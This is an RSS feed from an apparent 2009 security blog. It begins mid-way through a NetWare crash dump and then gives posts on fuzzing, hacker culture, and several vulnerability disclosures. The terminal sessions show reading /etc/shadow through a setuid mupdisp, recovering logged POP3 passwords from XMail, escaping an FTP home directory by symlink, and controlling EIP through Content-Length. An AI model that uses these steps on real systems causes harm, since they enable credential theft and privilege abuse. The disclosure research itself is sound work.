    --00000000 (LOADER.NLM|KernelAddressSpace+0)
    --000022B6 (LOADER.NLM|KernelAddressSpace+22B6)
    00214018   (SERVER.NLM|WorkerThread+344)
    --39252B31
    --86179F6C
    00227F55   (SERVER.NLM|SchedTimerISR+85)
    --00000000 (LOADER.NLM|KernelAddressSpace+0)
    --00000001 (LOADER.NLM|KernelAddressSpace+1)
    --00000000 (LOADER.NLM|KernelAddressSpace+0)
    -001337F0  (LOADER.NLM|interruptVectorPool+0)
    -0013C570  (LOADER.NLM|kVirtualInterruptTable0+0)
    --00000010 (LOADER.NLM|KernelAddressSpace+10)
    0010818B   (LOADER.NLM|kTimer1Interrupt+1D)
    001077E9   (LOADER.NLM|kProcessProtectedModeInterrupt+39)
    --00000000 (LOADER.NLM|KernelAddressSpace+0)
    -0013C570  (LOADER.NLM|kVirtualInterruptTable0+0)
    --00000000 (LOADER.NLM|KernelAddressSpace+0)
    --392529C6
    00107147   (LOADER.NLM|kProtectedModeInterruptContinue+5F)
    --00000010 (LOADER.NLM|KernelAddressSpace+10)
    --00000010 (LOADER.NLM|KernelAddressSpace+10)
    --00000010 (LOADER.NLM|KernelAddressSpace+10)
    --00000000 (LOADER.NLM|KernelAddressSpace+0)
    --00000000 (LOADER.NLM|KernelAddressSpace+0)
    --00000000 (LOADER.NLM|KernelAddressSpace+0)
    --FFA1276D
    --00000000 (LOADER.NLM|KernelAddressSpace+0)
    --839FE2A0 (IDEATA.HAM|IfYouSeeThisYoureWayPastTheIDEDriver+3BA0)
    --FDE3AF4A
    00214018   (SERVER.NLM|WorkerThread+344)
    --00000008 (LOADER.NLM|KernelAddressSpace+8)
    --00000246 (LOADER.NLM|KernelAddressSpace+246)
    --00000000 (LOADER.NLM|KernelAddressSpace+0)
    --89D24220 (JVM.NLM|__fprem1_chk+1486)
    --00000000 (LOADER.NLM|KernelAddressSpace+0)
    --89D24220 (JVM.NLM|__fprem1_chk+1486)
    00221158   (SERVER.NLM|TcoNewSystemThreadEntryPoint+40)
    --89D24220 (JVM.NLM|__fprem1_chk+1486)
    --00000000 (LOADER.NLM|KernelAddressSpace+0)
    --00000000 (LOADER.NLM|KernelAddressSpace+0)
    --00000000 (LOADER.NLM|KernelAddressSpace+0)
    --00000000 (LOADER.NLM|KernelAddressSpace+0)
    --00007F80 (LOADER.NLM|KernelAddressSpace+7F80)
    --00000000 (LOADER.NLM|KernelAddressSpace+0)
    --8616904C
    003682FE   (SERVER.NLM|SwitchStacksAndCall+44)
    --FE00B0A0 (LOADER.NLM|OSAllocMemory+B0A0)
    --8616FF48
    --00002088 (LOADER.NLM|KernelAddressSpace+2088)
    --34343434
    --65657246
    --65657246
    --65657246
    --65657246
    --65657246
    --65657246
    --65657246
    --34343434
    --65657246
    --65657246
    --65657246
    --65657246
    --65657246
    --65657246
    --65657246
    --65657246
    Stack dump exceeded the valid memory limit

Additional Information:
    The hardware detected a problem while executing an interrupt service routine. The code being executed is owned by SERVER.NLM. It may be the source of the problem or there may have been a memory corruption.

Memory at EAX: Invalid dump address

Memory at EBX (9687EF4C):
    9687EF4C  00000000 00000000-00000000 00000000
    9687EF5C  00000000 00000000-00000000 464C4143  FLAC
    9687EF6C  00000000 00000000-00000000 00000000
    9687EF7C  00000000 00000000-00000000 00000000
    9687EF8C  00000000 000003E8-85E53B00 000003E8  h e  h
    9687EF9C  00000000 00000246-00000003 856E6F0D  F  no
    9687EFAC  FE2756A0 000003E8-C188BFC0 00000000  'V  h A
    9687EFBC  00000000 000003E8-00000002 00000246  h  F
    9687EFCC  8C027090 00000000-0000000C FE2756A0  p    'V
    9687EFDC  00000000 00000000-8B377420 00000003   7t
    9687EFEC  855EC6C0 00000246-00000000 00000002  F  F
    9687EFFC  8B377508 00000008-00000000 0000002F  7u
    9687F00C  C188BFC0 00000000-856F2E28 0000002F  A   o
    9687F01C  C188BFC0 00000000-00000000 C188CFC8  A    AOH
    9687F02C  9687F030 00261EE6-00000000 00000008  p0  f
    9687F03C  00000000 00000000-856FBB8D 0000002F    o

Memory at ECX (004EB8F0):
    004EB8F0  00000000 00000000-00000000 00000000
    004EB900  DA381B1E 00000658-FE00AD00 00000000  Z8 X  -
    004EB910  00000000 00000000-00000000 00000000
    004EB920  00000000 00000000-00000000 EC51D54E  lQUN
    004EB930  00000000 00000000-00000000 00000000
    004EB940  00000000 00000000-00000000 FE001900
    004EB950  00000008 FE001B9C-942A64DC 00000124  d
    004EB960  01031618 00000000-00000000 00000000
    004EB970  00000000 00000000-FE0AD980 99D29EC0  Y R
    004EB980  00001018 01031618-00000000 00000000
    004EB990  00000000 00000000-00000000 FE004084
    004EB9A0  9A09A744 00004A1B-01031618 00000000  'D J
    004EB9B0  00000000 00000000-00000000 00000000
    004EB9C0  004EB9BC 8DFA1978-99A392BC 002091D0  N97X   Y

    8D9E7FDC  9619C180 00000000-00221158 9619C180  A   X A
    8D9E7FEC  8C295900 00000000-00000000 00000000  Y
    8D9E7FFC  34343434         -                   4444
    Pointer exceeds valid memory limit

Memory at ESP (86179EF4):
    86179EF4  002048F1 00000000-000022B6 00214018  Hq   6
    86179F04  39252B31 86179F6C-00227F55 00000000  9%+1 l  U
    86179F14  00000001 00000000-001337F0 0013C570  7p Ep
    86179F24  00000010 0010818B-001077E9 00000000  wi
    86179F34  0013C570 00000000-392529C6 00107147  Ep  9%)F qG
    86179F44  00000010 00000010-00000010 00000000
    86179F54  00000000 00000000-FFA1276D 00000000  'm
    86179F64  839FE2A0 FDE3AF4A-00214018 00000008  b   c J
    86179F74  00000246 00000000-89D24220 00000000  F  RB
    86179F84  89D24220 00221158-89D24220 00000000  RB   X RB
    86179F94  00000000 00000000-00000000 00007F80
    86179FA4  00000000 8616904C-003682FE FE00B0A0  L 6   0
    86179FB4  8616FF48 00002088-34343434 65657246  H   4444 eerF
    86179FC4  65657246 65657246-65657246 65657246  eerF eerF eerF eerF
    86179FD4  65657246 65657246-34343434 65657246  eerF eerF 4444 eerF
    86179FE4  65657246 65657246-65657246 65657246  eerF eerF eerF eerF

Stack Walk:
    Current EIP: 00000000
    Stack     Contents
    EIP invalid

I have decided to release bf2, but no release date has been set yet. I am open now, and will be after Browser Fuzzer 2 is released, to suggestions to take into consideration for bf3, which I plan to begin working on in the near future. Bug on.</description><link>http://www.secuobs.com/revue/news/122400.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122400.shtml</guid></item>
<item><title>The Hunger for Utopia</title><description>Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - One good thing is that I am a multitasker, because often I tend to juggle multiple things, many, many things in fact, in my life all at once and still keep sane. Yay for me. School is starting back and the pre-test for a "This could be painful" class titled "Computer Literacy" is a joke. Of 130 questions, around 50 were how to do this and that, in a sometimes vague format but with many details on Microsoft Office products. A lot of the rest were an unusual form of redundancy, and quite honestly, I don't see Bill Gates breezing through this pre-exam. At least I should have gotten all the networking and "How to click on an icon"-like questions correct. I guess I'll be taking advantage of the full course this semester and learn stuff. ARG. Oh well, my other classes seem alright though; I'll have some fun, I'm sure.

Browser Fuzzer 2 was recently released. I will be releasing some things under Krakow Labs now, so you may want to check there every once in a while or look for new releases on the security sites.

By the way, what is up with people turning in DoS vulns as full blown "buffer overflow exploits"? It's slightly confusing when I see them come in and my eyes light up, just to be let down when there's literally no possibility of useful code getting executed. It's not too bad when there is at least a possibility of code execution, but when you have no control of the registers and you paste output that clearly shows you haven't got a clue, that's... I'm going to do another "Wow", ok. Alright, that should do it, much better now.

On another note, XMail on Debian sarge/etch logs POP3 usernames and passwords in readable and writeable logs. The versions they both ship don't even support the 'fix' for the 'feature', so happy harvesting. Ubuntu's latest version has only username logging enabled by default. I believe they implemented this 'feature' (the one that defines whether passwords are logged or not, HMMM) in 1.25 or something.

bugs@debian:~# nc localhost 110
+OK XMail 1.21 POP3 Server service ready; Sun, 18 Jan 2009 01:59:32 -0500
USER boxer
+OK Password required for boxer@localhost
PASS superman
+OK Maildrop has 0 messages (0 bytes)
LIST
+OK 0 0
.
QUIT
+OK XMail 1.21 POP3 Server closing session
bugs@debian:~# grep boxer /var/log/xmail/pop* | tail -1
"localhost.localdomain"	"localhost"	"127.0.0.1"	"2009-01-18 01:59:37"	"boxer"	"superman"
bugs@debian:~#

Note: superman really isn't my password, lol. Above is the example on sarge, tested on Etch too.

Here is some interesting URI stuff to play with on IE:

res://ieframe.dll/preview.dlg
res://ieframe.dll/dnserror.htm
res://ieframe.dll/24/123
res://ieframe.dll/MUI/1
res://ieframe.dll/TYPELIB/1
res://ieframe.dll/UIFILE/20481 (also 20482, 20483, 20484, 20485, 20486, 20487, 39216, 41555)
res://ieframe.dll/WEVT_TEMPLATE/1
res://ieframe.dll/Version Info/1
res://ieframe.dll/23/ABOUT.js
res://ieframe.dll/23/ANALYZE.js
res://ieframe.dll/23/ANCHBRWS.js
res://ieframe.dll/23/DOCBROWS.js
res://ieframe.dll/23/ERROR.js
res://ieframe.dll/23/HTTPERRORPAGESSCRIPTS.js
res://ieframe.dll/23/IEERROR.js
res://ieframe.dll/23/IMGBROWS.js
res://ieframe.dll/23/INVALIDCERT.js
res://ieframe.dll/23/ORGFAV.js
res://ieframe.dll/23/PHISHSITE.js
res://ieframe.dll/23/POLICY.js
res://ieframe.dll/23/PREVIEW.js
res://ieframe.dll/preview.dlg (dialog)
res://ieframe.dll/23/PSTEMPLATES.js
res://ieframe.dll/24/123 (XML file)

Some I got myself, but most I found here a while back when I was researching IE. Thanks to that guy for most of them. Research continues, the show must go on. I am in a deep development mindset right now and my fingers won't let me stop typing. "HACKER GET WHAT HACKER WANT", like that one commercial, lol.</description><link>http://www.secuobs.com/revue/news/122399.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122399.shtml</guid></item>
<item><title>Oh, Industry</title><description>Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - The state of the computer security industry has changed slowly, yet frequently, since its conception. It is no longer easy to find vulnerabilities in products that are worth their exploit code. I am not at all saying that hacking is a dying profession; oh, hacking will be here until the end. I am saying that things are different than how they used to be. Penetration testing is actually a vibrant field, and it works when you have the right people. Choosing the wrong people just costs you money. Fuzzing has taken off like never before, with everybody and their grandmother studying protocols to get the latest code complete for testing. It is all for the bugs. Well, for some it's for the money too; people do have to make a living. Nobody wants to be just independent forever; family men and women have to support their families. The mastery of the security arts helps and hurts, but usually they are never both thought of at the same time, or a world of confusion and ethical upbringing would become a flaming sword that is ready to divide their hearts. Oh, pity the junkies who never give themselves a chance. Better yet, let's give them an industry that sells fear to those junkies. Why not the old profit/power formula? And power, unrestrained but accountable power, could make even the modest researcher's eyes twinkle like the stars in the sky. Yet these questions rarely come up until networks and systems have been compromised. As history shows, nothing will be done about a problem until an event occurs that provokes undeniable acknowledgement and remediation. FUD isn't just in political affairs; it's in every form of bureaucracy, even those forms which get downplayed or even conveniently forgotten. It is ever so slightly poetic. Oh, Industry.</description><link>http://www.secuobs.com/revue/news/122398.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122398.shtml</guid></item>
<item><title>Headfirst Slide into Cooperstown on a Bad Bet</title><description>Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - When anything is released, there are almost inevitably going to be people who don't like it or have malicious comments to make. No matter how good or bad it really is, people may even group together and form an anti-constructive criticism movement for their own benefit, fun, or simple pleasure. It's not a big deal. I release things because I want to, I think they are good and helpful, and I want to share my research with the world. I have in the past released things. In the past I have not released things. Everyone has their own preferences and ideas, and it is, in my own opinion, at least an attempt at counter-production when people unkindly discuss projects. Especially when people, usually when it occurs, hide behind the keyboard to do it. Caring what people think is so, so overrated. Besides all of that, lots of time and hard work go into research, and often the people who have nothing to do with it are the ones who find it trivial to make unsavoury comments. I am me, you are you. I understand that some people's goals are always going to be trying, directly or indirectly, to damage things. That's life. I guess I will just keep being the nice guy I am and say "they certainly make life interesting", and be myself as always. I know there is a happy ending, somewhere. And more woes from my computer literacy course. If it only mattered for me to prove a point. One may ponder on the thought that these courses may need some adjustment.</description><link>http://www.secuobs.com/revue/news/122397.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122397.shtml</guid></item>
<item><title>Although quitting Eudora now will protect from buffer overflow exploits</title><description>Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - I just wanted to share a hysterical message in a dialog box from Eudora when it hears the gushing data overflowing its buffers: "A buffer overflow has been detected in Eudora." Great, but it seems like Eudora is better at detecting them than preventing them. "In rare cases a buffer overflow could be exploited to compromise the security of your computer if you allow Eudora to continue to run." Really, in "rare" cases, you say? It is no wonder why running fzem against Eudora yielded some unsurprising results. "Warning: Although quitting Eudora now will protect from buffer overflow exploits, any work you have in progress will not be saved and will be lost." So if you save me from the buffer overflow exploit, the draft I was working on will be lost and I'll have to deal with it. Fair enough, but only if the protection scheme actually works. And just take one more look at this. Secret message (irony): "Although quitting Eudora now will protect from buffer overflow exploits." "Quit Eudora now?" Sure. Lemme go download Thunderbird right away. Though Eudora has been discontinued for a while now, it is still useful for testing and quite fun to play around with.</description><link>http://www.secuobs.com/revue/news/122396.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122396.shtml</guid></item>
<item><title>Fuzzing T-shirt</title><description>Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - After looking over Powerfuzzer's website, I found a cool link to an actual fuzzing shirt, the first one of its kind that I've seen. Check it out. I figure for some readers it may be a good investment.</description><link>http://www.secuobs.com/revue/news/122395.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122395.shtml</guid></item>
<item><title>NetWare Core Protocol Fun</title><description>Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - I've been playing with Novell's NCP and it's interesting, to say the least. I will share a bit of research with you; also note that Ethereal/Wireshark's NCP dissector is decent and can help you out tons if you are interested in this protocol.

Packets (reply packets) usually look something like this:

sig  \x74\x4e\x63\x50   reply signature ("tNCP")
len  \x00\x00\x00\x10   length (16)
srp  \x33\x33           type (service reply, 0x3333)
seq  \x00               sequence number (0)
cnm  \x19               connection number (25)
tnm  \x01\xff           task number (1)
ccd  \x00               completion code (0)
cst  \x00               connection status (0)

Also, request packets use \x44\x6d\x64\x54 ("DmdT"), not "tNCP". Sniffing the Novell Client is kinda fun.</description><link>http://www.secuobs.com/revue/news/122394.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122394.shtml</guid></item>
<item><title>The Hacker's Manifesto</title><description>Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - I was thinking about it and hadn't read it for a while, so I broke out the literature and just felt so comfortable. It must be shared. A great, GREAT read indeed.

Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"... Damn kids. They're all alike.

But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him? I am a hacker, enter my world...

Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me... Damn underachiever. They're all alike.

I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..." Damn kid. Probably copied it. They're all alike.

I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me... Or thinks I'm a smart ass... Or doesn't like teaching and shouldn't be here... Damn kid. All he does is play games. They're all alike.

And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found. "This is it... this is where I belong..." I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all... Damn kid. Tying up the phone line again. They're all alike...

You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us willing pupils, but those few are like drops of water in the desert.

This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals.

Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.

I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike.</description><link>http://www.secuobs.com/revue/news/122393.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122393.shtml</guid></item>
<item><title>Carpe Noctem</title><description>Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - Carpe Noctem translates to "Seize the Night", showing descriptive abilities as the indirect (or direct) _motto_ of computer security people around the world, for the young and old alike. I like to write and found myself writing this song one night. Enjoy.

Carpe Noctem

V1
I traceroute my target and find it across the sea
I've done this before, how hard can it be
Discovering the services, my heart starts to race
But the night starts to end, anyways I have to wait
The next quest is getting around the IDS
Encryption does well against the best
I'll pull out my exploits to help along the way
Carpe Noctem is all I have to say

CHORUS
Because your server, your clients, all are mine
Even if I have to crack hashes for all of time
I'll get what I want, and that's something you should factor
I own boxes and networks and they call me a hacker

V2
It's back to the race once I own their database
Piggybacking ports always puts a smile on my face
I own your box, Mr. Admin, so I'll make myself an image
I'll be sniffing your traffic and I'll decide when I'm finished
My backdoor keeps me safe and I'm tunneling through plenty of hosts
Got more keys to the gateways but I like the environment the most
Modified some binaries with some different code
It's time to go so I turn off the wifi and hit the road

CHORUS
Because your server, your clients, all are mine
Even if I have to crack hashes for all of time
I'll get what I want, and that's something you should factor
I write exploits and spawn shells and they call me a hacker

V3
Day 3 I'm back and I'm actually almost there
132 out of 150 hosts owned and 0days weren't spared
Seems their devs wrote a custom file server
Fuzzed it for hours and I found it insecure
Borrowing the source code was fun itself
Writing up an exploit proved good for my health
Typing so fast so excited to finally hit a root shell
A job well done, kept my access but covered my trail

CHORUS
Because your server, your clients, all are mine
Even if I have to crack hashes for all of time
I'll get what I want, and that's something you should factor
I am one with the machine and they call me a hacker

OUTRO
No, Norton will not protect you
Yes, your logs lied again
No, security doesn't exist
It's our game, so of course we're going to win

For the record, this writing is fictional.</description><link>http://www.secuobs.com/revue/news/122392.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122392.shtml</guid></item>
<item><title>How healthy is your Content-Length </title><description>Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - I came across an interesting bug a few days ago while testing my new HTTP client/server fuzzer. The target was a convenient HTTP server built for win32 and very useful for the software package. The server runs, displays content, etc. Basically, it is included in case you don't have or don't want to use another web server to display its core content. Anyways, I was running Hzzp against it and got a Microsoft Visual C++ Runtime Error. Oh yeah. I looked at my terminal and saw it was fuzzing Content-Length with numbers. Hzzp had sent a request with the HTTP header Content-Length set to -1. I ran the software in the debugger and used custom options to trigger the bug again. The server stopped in Olly, I hit continue. That is when the EIP caught my attention: it was 0xFFFFFFFF. Hmmmmmmmmm, very interesting. This certainly looked delicious, so I debugged further. I soon figured out that I could dictate the instruction pointer directly through Content-Length, in decimal notation (calc: 0xabcddcba = 2882395322). I send a request with Content-Length: 2882395322 and EIP = 0xabcddcba. I took a look at the source, and the developer who wrote how Content-Length was interpreted seems more than happy to let clients control Content-Length quite deliberately. It later gets banged up in memcpy() and leads to us owning EIP. Quite a useful memory corruption vulnerability.</description><link>http://www.secuobs.com/revue/news/122391.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122391.shtml</guid></item>
<item><title>Pop-up Blockers VS Realplayer</title><description>Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - I guess these days are different than those in which pop-up blockers were still relevant. Because of the built-in protection most major web browsers offer, the era of those beastly applications has declined, if not been forgotten. Bug hunting in ActiveX controls has left the field nearly extinct for most software, but not all of course. Not that I'm saying there aren't any more bugs out there, but there are far fewer than ever before. An interesting "issue" (not much in the way of a security issue) is in Realplayer's ierpplug.dll. The control associated with ierpplug.dll ({FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}) contains a method called "OpenURLInPlayerBrowser". As you might have figured, we can open any URL in Realplayer using this function. Now, not that any pop-up blockers were designed to deal with this, because I doubt they were or they would have, but we can bypass them and get Realplayer to open URLs for us. That means most websites that IE will open (Realplayer basically uses IE), Realplayer can open as well. It's as easy as activex.OpenURLInPlayerBrowser(url). Nothing special, it just may come in handy sometime.</description><link>http://www.secuobs.com/revue/news/122390.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122390.shtml</guid></item>
<item><title>Practical Insecurity</title><description>Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - A thousand words, indeed. I also discovered something funny about PuTTY: you could trick a local user into launching another executable if they choose to duplicate their session. A scenario would go something like this (ex: putty.exe on the Desktop):

- Target launches PuTTY and opens a session.
- Some time later an attacker manages to move putty.exe somewhere off the Desktop (while the session is open) and replaces it with ANOTHER executable, named putty.exe.
- Target comes back and decides they need a duplicate session ("Duplicate Session" on the menu).
- But instead of a duplicate session, the attacker's executable is launched, and we all know how that works.

Probably not very useful for much of anyone, just something funny about PuTTY's functionality.

I'm excited to announce the release of Hzzp for Monday, April 27th 2009. After countless hours of bug hunting, this valuable fuzzing tool has served its purpose well. After a near rewrite and restructuring of Hzzp, it's ready for public release at Krakow Labs tomorrow. Happy Fuzzing.</description><link>http://www.secuobs.com/revue/news/122389.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122389.shtml</guid></item>
<item><title>Go Go GrabIt </title><description>Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - After seeing this advisory for my favorite win32 newsgroup software, I had to check it out. Before I had time to write a proper exploit, however, someone, as usual, had posted a low quality one soon thereafter. Right. Well, mine should win any race with the first near proof of concept anyways; milw0rm was kind enough to host it for me - here.

I was poking around some ports on my FreeBSD box and found a privileged partial read via the configuration file flag in 0W-httpd (ZeroWait httpd). Too bad it's only suid/sgid www.

root@freebsd:/tmp# ls -al /usr/local/sbin/0W-httpd
-rwsr-sr-x  1 www  www  111100 May  5 15:50 /usr/local/sbin/0W-httpd
root@freebsd:/tmp# echo "www's-eyes-only" > secret
root@freebsd:/tmp# chown www:www /tmp/secret
root@freebsd:/tmp# chmod 700 /tmp/secret
root@freebsd:/tmp# exit
exit
rush@freebsd:~$ cat /tmp/secret
cat: /tmp/secret: Permission denied
rush@freebsd:~$ /usr/local/sbin/0W-httpd -f -c /tmp/secret
16:00:54 httpd: cannot create directory logs/2009-05-05: No such file or directory
16:00:54 httpd: cannot create directory logs/2009-05-05: No such file or directory
16:00:54 httpd: 53677 is starting to work
16:00:54 httpd: unknown option 'www's-eyes-only'
16:00:54 httpd: config error at www's-eyes-only /usr/local/etc/0W-httpd /tmp/secret:1
16:00:54 httpd: 53677 is exited due to some init error
rush@freebsd:~$</description><link>http://www.secuobs.com/revue/news/122388.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122388.shtml</guid></item>
<item><title>SQL Injection is Dangerous</title><description>Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - Apparently, because attackers used a SQL injection flaw in the administration panel at domainz.net to deface the highest of high profile nz and pr websites. Zone-H has got the full story. Google and Gmail, Microsoft, MSN, MSDN, and Hotmail, Sony, Dell, and even Paypal weren't spared. I'm not a fan of defacements, but this is shocking. Even though they got lucky and exploited the administration panel, which is far from a leet hack, well, this still isn't too bad. It's not like they broke the servers themselves, but they changed the DNS records. There is a certain beauty in carefully crafted code, spawning a shell and breaking root, but, yeah, easy works too. It's been that time for a while for us to think outside the box any way we can. Hacking is delicious.</description><link>http://www.secuobs.com/revue/news/122387.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122387.shtml</guid></item>
<item><title>Leet Trip Odometer</title><description>Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - I stopped to check the mail and barely got a snapshot of this, haha. In case you're blind, my trip odometer reads "1337" (it was turning to 1338, I tried to stop as fast as I could). How cool is that? :D</description><link>http://www.secuobs.com/revue/news/122386.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122386.shtml</guid></item>
<item><title>Mup Local Arbitrary File Disclosure</title><description>Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - Mup is a shareware program for printing music.

% grep -B1 4755 mup-5.6/makefile
# For Linux console mode support, uncomment the following line
#	chown root $(BINDIR)/mupdisp
#	chmod 4755 $(BINDIR)/mupdisp
% ls -al /usr/bin/mupdisp
-rwsr-xr-x 1 root root 815245 2009-05-26 15:57 /usr/bin/mupdisp
% /usr/bin/mupdisp /etc/shadow
Mupdisp - Version 5.6
Mup - Music Publisher   Version 5.6
Copyright (c) 1995-2009 by Arkkra Enterprises. All rights reserved.
/etc/shadow: line 1: root:$1$kXXXXXXXXXXXXXXXXXXXXXXXXXX:14360:0:99999:7:::
stopping due to previous errors
%

Reading the first line of the grep output tells us that mupdisp (mupdisp runs Mup and then runs GhostScript on the result) will be SUID root if the user enables "Linux console mode support".

Vendor Response: "The tgz version already does not use setuid, so there should be no issue for people installing from that, unless they explicitly choose to change the mode. The same is true for anyone compiling for themselves. We will change the rpm spec file to not do setuid. We can also suggest using sudo rather than setuid, which is a better alternative that was not available yet at the time mupdisp was originally written."

This came after explaining that a workaround is not a fix. Oh dear.</description><link>http://www.secuobs.com/revue/news/122385.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122385.shtml</guid></item>
<item><title>Breaking Out in SurgeFTP</title><description>Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - There is a funny bug in SurgeFTP that allows users to break out of their home directory. SurgeFTP will follow symbolic links, so exploiting this is as easy as being able to create links to directories of your choosing.

rush@ubuntu:~$ ftp example
Connected to example.
220 SurgeFTP example (Version 23a6)
Name (example:rush): test
331 Password required for test
Password:
230- Alias                Real path                      Access
230- /                    /home/test                     read write
230 User test logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
257 "/" is current directory
ftp> ls
200 PORT command successful
150 Opening BINARY connection for /
-rw-------   1 test     test           75 Jun  4 22:09 .bash_history
-rw-r--r--   1 test     test          220 Jun  4 22:07 .bash_logout
-rw-r--r--   1 test     test         3115 Jun  4 22:07 .bashrc
-rw-r--r--   1 test     test          675 Jun  4 22:07 .profile
lrwxrwxrwx   1 test     test         4096 Jun  4 22:09 fs -> /
226 Transfer complete
ftp> cd fs
250 CWD command successful now /fs
ftp> pwd
257 "/fs" is current directory
ftp> ls
200 PORT command successful
150 Opening BINARY connection for /fs
drwxr-xr-x   2 root     root         4096 May 15 00:10 bin
drwxr-xr-x   3 root     root         4096 May 15 13:34 boot
lrwxrwxrwx   1 root     root         4096 Apr 28 12:02 cdrom -> media/cdrom
drwxr-xr-x   3 root     root         4096 May 22 14:32 debian
drwxr-xr-x  15 root     root         3800 Jun  4 13:11 dev
drwxr-xr-x 160 root     root        12288 Jun  4 22:07 etc
drwxr-xr-x   6 root     root         4096 Jun  4 22:07 home
lrwxrwxrwx   1 root     root      7534504 May 15 00:25 initrd.img -> boot/initrd.img-2.6.28-11-generic
lrwxrwxrwx   1 root     root      8220906 Apr 28 12:34 initrd.img.old -> boot/initrd.img-2.6.27-7-generic
drwxr-xr-x  20 root     root        12288 May 22 14:18 lib
drwx------   2 root     root        16384 Apr 28 12:01 lost+found
drwxr-xr-x   3 root     root         4096 Oct 29  2008 media
drwxr-xr-x   2 root     root         4096 Oct 20  2008 mnt
drwxr-xr-x   3 root     root         4096 May 29 01:18 opt
dr-xr-xr-x 153 root     root            0 Jun  4 13:09 proc
drwxr-xr-x  13 root     root         4096 May 22 16:43 root
drwxr-xr-x   2 root     root         4096 May 15 20:09 sbin
drwxr-xr-x   2 root     root         4096 Mar  6 11:21 selinux
drwxr-xr-x   2 root     root         4096 Oct 29  2008 srv
drwxr-xr-x  12 root     root            0 Jun  4 13:09 sys
drwxrwxrwt  17 root     root        20480 Jun  4 21:50 tmp
drwxr-xr-x  12 root     root         4096 May 22 14:18 usr
drwxr-xr-x  16 root     root         4096 May 22 14:10 var
lrwxrwxrwx   1 root     root      3501776 May 15 00:25 vmlinuz -> boot/vmlinuz-2.6.28-11-generic
lrwxrwxrwx   1 root     root      2244272 Apr 28 12:34 vmlinuz.old -> boot/vmlinuz-2.6.27-7-generic
226 Transfer complete
ftp> cd /
250 CWD command successful now /
ftp> pwd
257 "/" is current directory
ftp> ls
200 PORT command successful
150 Opening BINARY connection for /
-rw-------   1 test     test           75 Jun  4 22:09 .bash_history
-rw-r--r--   1 test     test          220 Jun  4 22:07 .bash_logout
-rw-r--r--   1 test     test         3115 Jun  4 22:07 .bashrc
-rw-r--r--   1 test     test          675 Jun  4 22:07 .profile
lrwxrwxrwx   1 test     test         4096 Jun  4 22:09 fs -> /
226 Transfer complete
ftp> bye
221 Closing connection - goodbye
rush@ubuntu:~$

Since the user would have to be able to make the links in the first place (probably using a shell), the risk is low in most circumstances.

Vendor Response: "Thanks for reporting this, here is a new build: http://netwinsite.com/ftp/misc/surgeftp_23a10_linux.tar.gz. This has a new setting, global_nosymlink "true", which you can turn on to disable this behaviour."

Much better than nothing.</description><link>http://www.secuobs.com/revue/news/122384.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122384.shtml</guid></item>
</channel>
</rss>
 
